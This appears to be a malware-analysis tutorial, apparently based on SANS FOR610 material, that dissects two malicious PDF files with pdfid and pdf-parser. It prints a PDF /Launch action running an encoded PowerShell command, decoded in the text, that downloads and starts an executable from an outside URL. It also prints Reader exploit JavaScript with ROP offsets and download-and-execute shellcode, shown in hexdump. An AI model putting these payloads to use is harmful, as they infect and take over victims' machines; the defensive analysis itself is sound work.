A PDF is a collection of elements
%pdf-1.6
and other PDF version info.X Y obj
endobj
// X is the object number
// Y is the version or generation number
Below is an example of an Indirect Object
1 0 obj
Type: /Page
<<
/AA /O 43 0 R
>>
endobj
/AA
means Automatic Action and /O
means upon opening the document. This directs the PDF file to take and automatic action, referenced in object #43, version 0, upon opening the document. The R
at the end is needed to reference the indirect object #43/0
/OpenAction
is similar to /AA /O
: it executes an action open a file open
A lot of PDFs can contain a JS stream that loads up a shellcode and exploits a PDF vulnerability to spray the heap with it. If you encounter shellcode in a JS script, its most probably in an encoded format as Unicode. Use base64dump.py -e pu
to extract it in a sexy, raw binary format.
This example was taken from SANS FOR610 course.
Running pdf-parser yield the following:
$ pdfid ctk.pdf
PDFiD 0.2.1 ctk.pdf
PDF Header: %PDF-1.1
obj 5
endobj 5
stream 1
endstream 0
xref 1
trailer 1
startxref 1
/Page 1
/Encrypt 0
/ObjStm 0
/JS 0
/JavaScript 0
/AA 0
/OpenAction 1
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 1
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0
The result above shows that we have one /OpenAction
element. This means one element is able to execute upon opening the PDF document. This already should raise a red flag.
Below is the output of pdf-parser
PDF Comment '%PDF-1.1\r\n'
obj 1 0
Type: /Catalog
Referencing: 2 0 R
<<
/OpenAction
<<
/S /Launch
/Win
<<
/F '(C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe)'
/P (powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBuAGMAZAB1AGcAYQBuAGQAYQAuAG8AcgBnAC8ALgBjAHMAcwAvAGEAdwBvAHIAaQAuAGUAeABlACcALAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYQB3AG8AcgBpAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAGEAdwBvAHIAaQAuAGUAeABlAB0gKQA= -windowstyle hidden)
>>
>>
/Pages 2 0 R
/Type /Catalog
>>
...
...
...
trailer
<<
/Size 6
/Root 1 0 R
/ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]
>>
Let’s break it down: The first element is the Header we mentioned before. The last element is the Trailer. This is actually quite important since it contains a breakdown of how many elements are there in total and the root element that is executed foremost when the document is executed. Above, the /Root
dictionary entry references 1 0 R
, the first object in the document.
obj 1 0
contains a /OpenAction
dictionary entry that looks like it will run in a \win
environment and launch a powershell.exe
with the parameters indicated with /p
. The parameters are encoded with Base64. Decoding it would yield the following:
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/awori.exe',
$env:APPDATA\awori.exe
);Start-Process (
$env:APPDATA\awori.exe
Looks like our PDF will download awori.exe
and launch it. Fun!!
This malware sample was provided by SANS FOR610.
The following sample is named page.pdf
$ pdfid page.pdf
PDFiD 0.2.1 page.pdf
PDF Header: %PDF-1.5
obj 6
endobj 6
stream 2
endstream 2
xref 1
trailer 1
startxref 1
/Page 1
/Encrypt 0
/ObjStm 0
/JS 0
/JavaScript 0
/AA 0
/OpenAction 0
/AcroForm 1
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 0
/XFA 1
/Colors > 2^24 0
We see that we have one AcroForm
object. <TODO: What is Acroform?>
Examining the document’s Trailer with pdf_parser reveals:
trailer
<<
/Root 3 0 R
/Size 7
>>
Examining obj 3 0
reveals:
obj 3 0
Type: /Catalog
Referencing: 4 0 R, 2 0 R
<<
/Extensions
<<
/ADBE
<<
/ExtensionLevel 3
/BaseVersion /1.7
>>
>>
/Pages 4 0 R
/AcroForm 2 0 R
/Type /Catalog
/NeedsRendering true
>>
obj 3 0
references /AcroForm 2 0 R
. Examining this AcroForm reveals:
obj 1 0
Type:
Referencing:
Contains stream
<<
/Filter /FlateDecode
/Length 403673
>>
obj 2 0
Type:
Referencing: 1 0 R
<<
/XFA 1 0 R
>>
obj 2 0
references obj 1 0
and obj 1 0
contains a very large encoded stream. Luckily, pdf-parser has the ability to decode /FlateDecode
streams
$ pdf-parser page.pdf --raw --filter -o 1 | vim -
Vim: Reading from stdin...
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7">
<template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
<?formServer defaultPDFRenderFormat acrobat9.1static?>
<?formServer allowRenderCaching 0?>
<?formServer formModel both?>
<subform name="form1" layout="tb" locale="en_US" restoreState="auto">
<pageSet>
<pageArea name="Page1" id="Page1">
<contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
<medium stock="default" short="612pt" long="792pt"/>
<?templateDesigner expand 1?>
</pageArea>
<?templateDesigner expand 1?>
</pageSet>
<variables>
<script name="util" contentType="application/x-javascript">
function pack(i){
var low = (i & 0xffff);
var high = ((i>>16) & 0xffff);
return String.fromCharCode(low)+String.fromCharCode(high);
}
function unpackAt(s, pos){
return s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16);
}
function packs(s){
result = "";
for (i=0;i<s.length;i+=2)
result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8));
return result;
}
function packh(s){
return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16));
}
function packhs(s){
result = "";
for (i=0;i<s.length;i+=4)
result += packh(s.slice(i,i+4));
return result;
}
var _offsets = {"Reader": {
"9.303": {
"acrord32": 0x85,
"rop0": 0x14BA8,
"rop1": 0x1E73AF,
"rop1x": 0x2F12,
"rop2": 0x196774,
"rop3": 0xE475,
"rop3x": 0xE476,
We have a script!! The names sounds lovely: unpackAt()
, packs
, packh()
. Looking a bit deeper, we can see a NOP slide with a variable called shellcode
:
var shellcode = "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u77eb\uc931\u8b64\u3071\u768b\u8b0c\u1c76\u5e8b\u8b08\u207e\u368b\u3966\u184f\uf275\u60c3\u6c8b\u2424\u458b\u8b3c\u0554\u0178\u8bea\u184a\u5a8b\u0120\ue3eb\u4934\u348b\u018b\u31ee\u31ff\ufcc0\u84ac\u74c0\uc107\u0dcf\uc701\uf4eb\u7c3b\u2824\ue175\u5a8b\u0124\u66eb\u0c8b\u8b4b\u1c5a\ueb01\u048b\u018b\u89e8\u2444\u611c\ue8c3\uff92\uffff\u815f\u98ef\uffff\uebff\ue805\uffed\uffff\u8e68\u0e4e\u53ec\u94e8\uffff\u31ff\u66c9\u6fb9\u516e\u7568\u6c72\u546d\ud0ff\u3668\u2f1a\u5070\u7ae8\uffff\u31ff\u51c9\u8d51\u8137\ueec6\uffff\u8dff\u0c56\u5752\uff51\u68d0\ufe98\u0e8a\ue853\uff5b\uffff\u5141\uff56\u68d0\ud87e\u73e2\ue853\uff4b\uffff\ud0ff\u6d63\u2e64\u7865\u2065\u632f\u2020\u2e61\u7865\u0065\u7468\u7074\u2f3a\u772f\u7777\u652e\u7078\u6f6c\u7469\u616d\u657a\u632e\u6d6f\u302f\u6131\u696b\u2e6e\u7865\u0065\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090";
var shellcode2 = shellcode[0] + util.pack((verB << 16) | verA) + shellcode.substring(3);
var add_num = verA >= 11 ? 16 : 14;
So, we found some shellcode in a bunch of thank-god-its-not-obfuscated Javascript inside a PDF. Let’s hexdump the shellcode and see what we can find.
$ pdf-parser page.pdf --object 1 --filter --raw -d decoded_js.txt
$ base64dump.py -e bu decoded_js.txt
ID Size Encoded Decoded MD5 decoded
-- ---- ------- ------- -----------
1: 900 \u4f4f\u4f4f\u4f OOOOOOOOOOOOOOOO ff23042711ff00cb5aedbf5ccef4df7a
2: 24 \u5858\u5858\u56 XXXXxV4. f3b3858bc27cf47d3c4ed57be1bd127b
3: 6000 \u9090\u9090\u90 c6f73cbc08fa0754df7d1cee089e87ff
4: 6 \u5858 XX c51b57a703ba1c5869228690c93e1701
5: 6 \u0000 .. c4103f122d27677c9db144cae1394a66
6: 6 \u0000 .. c4103f122d27677c9db144cae1394a66
$ base64dump.py -e bu decoded_js.txt -s 3 -d > sc.bin
$ hexdump -C sc.bin
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000020 eb 77 31 c9 64 8b 71 30 8b 76 0c 8b 76 1c 8b 5e |.w1.d.q0.v..v..^|
00000030 08 8b 7e 20 8b 36 66 39 4f 18 75 f2 c3 60 8b 6c |..~ .6f9O.u..`.l|
00000040 24 24 8b 45 3c 8b 54 05 78 01 ea 8b 4a 18 8b 5a |$$.E<.T.x...J..Z|
00000050 20 01 eb e3 34 49 8b 34 8b 01 ee 31 ff 31 c0 fc | ...4I.4...1.1..|
00000060 ac 84 c0 74 07 c1 cf 0d 01 c7 eb f4 3b 7c 24 28 |...t........;|$(|
00000070 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb |u..Z$..f..K.Z...|
00000080 8b 04 8b 01 e8 89 44 24 1c 61 c3 e8 92 ff ff ff |......D$.a......|
00000090 5f 81 ef 98 ff ff ff eb 05 e8 ed ff ff ff 68 8e |_.............h.|
000000a0 4e 0e ec 53 e8 94 ff ff ff 31 c9 66 b9 6f 6e 51 |N..S.....1.f.onQ|
000000b0 68 75 72 6c 6d 54 ff d0 68 36 1a 2f 70 50 e8 7a |hurlmT..h6./pP.z|
000000c0 ff ff ff 31 c9 51 51 8d 37 81 c6 ee ff ff ff 8d |...1.QQ.7.......|
000000d0 56 0c 52 57 51 ff d0 68 98 fe 8a 0e 53 e8 5b ff |V.RWQ..h....S.[.|
000000e0 ff ff 41 51 56 ff d0 68 7e d8 e2 73 53 e8 4b ff |..AQV..h~..sS.K.|
000000f0 ff ff ff d0 63 6d 64 2e 65 78 65 20 2f 63 20 20 |....cmd.exe /c |
00000100 61 2e 65 78 65 00 68 74 74 70 3a 2f 2f 77 77 77 |a.exe.http://www|
00000110 2e 65 78 70 6c 6f 69 74 6d 61 7a 65 2e 63 6f 6d |.exploitmaze.com|
00000120 2f 30 31 61 6b 69 6e 2e 65 78 65 00 90 90 90 90 |/01akin.exe.....|
00000130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000007d0
$
A cursory glance with hexdump -C
shows cmd.exe \c a.exe
and an HTTP URL. Now, we can examine it further with scdbg or wrap it as an exe and debug it to know more on the shellcode, but I believe our work here is done.
There’s a process to examining malicious documents. Lenny Zeltser from SANS FOR610 mentions the following:
Till next time